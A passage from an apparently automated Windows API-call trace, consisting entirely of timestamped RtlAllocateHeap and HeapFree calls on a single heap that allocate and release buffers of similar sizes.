RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.709] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.710] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.710] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.710] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.710] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.710] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.710] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.710] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.710] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.710] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.710] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.710] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.710] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.710] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.710] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.710] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.710] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.710] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.710] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.710] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.710] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.710] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.710] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.710] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.710] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.710] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0059.710] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.710] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.710] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.710] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.710] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.710] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.710] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.710] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.710] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.710] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.710] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.711] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.711] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.711] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.711] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.711] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.711] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.711] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.711] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.711] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.711] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.711] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.711] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.711] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.711] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.711] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.711] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.711] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.711] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.711] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.711] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.711] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.711] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.711] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.711] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.711] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.711] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.711] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.711] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.711] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.711] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.711] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.711] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.711] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.711] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.712] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.712] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.712] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.712] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.712] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.712] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.712] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.712] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.712] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.712] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.712] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.712] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.712] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.712] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.712] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.712] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.712] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.712] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.712] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.712] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.712] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0059.712] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.712] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.712] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.712] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.712] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.712] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.712] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.712] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.712] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.712] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0059.712] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.712] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.712] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.712] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.713] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.713] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.713] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.713] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.713] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.713] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.713] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.713] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0059.713] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.713] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.713] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.713] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.713] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.713] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.713] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.713] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.713] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.714] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.714] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.714] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.714] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.714] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.714] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.714] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.714] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.714] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.714] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.714] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.714] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.714] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.714] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.714] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.714] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.714] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.714] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.714] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.714] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.714] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.714] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.714] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.714] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.714] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0059.714] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.714] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.714] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.714] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.714] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.714] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.714] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.714] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.714] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.714] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.715] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.715] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.715] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.715] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.715] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.715] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.715] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.715] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.715] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.715] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.715] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.715] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.715] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.715] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.715] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.715] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0059.715] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.715] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.715] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.715] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.715] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.715] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.715] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.715] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.715] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.715] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.715] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.715] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.715] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.715] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.715] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.715] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.715] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.715] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.715] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.716] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.716] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.716] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.716] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.716] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.716] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.716] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.716] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.716] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.716] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.716] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.716] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.716] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.716] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.716] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.716] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.716] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.716] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.716] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.716] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.716] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.716] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.716] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0059.716] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.716] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.716] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.716] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.716] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.716] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.716] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.716] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.716] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.716] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.716] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.717] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.717] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.717] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.717] 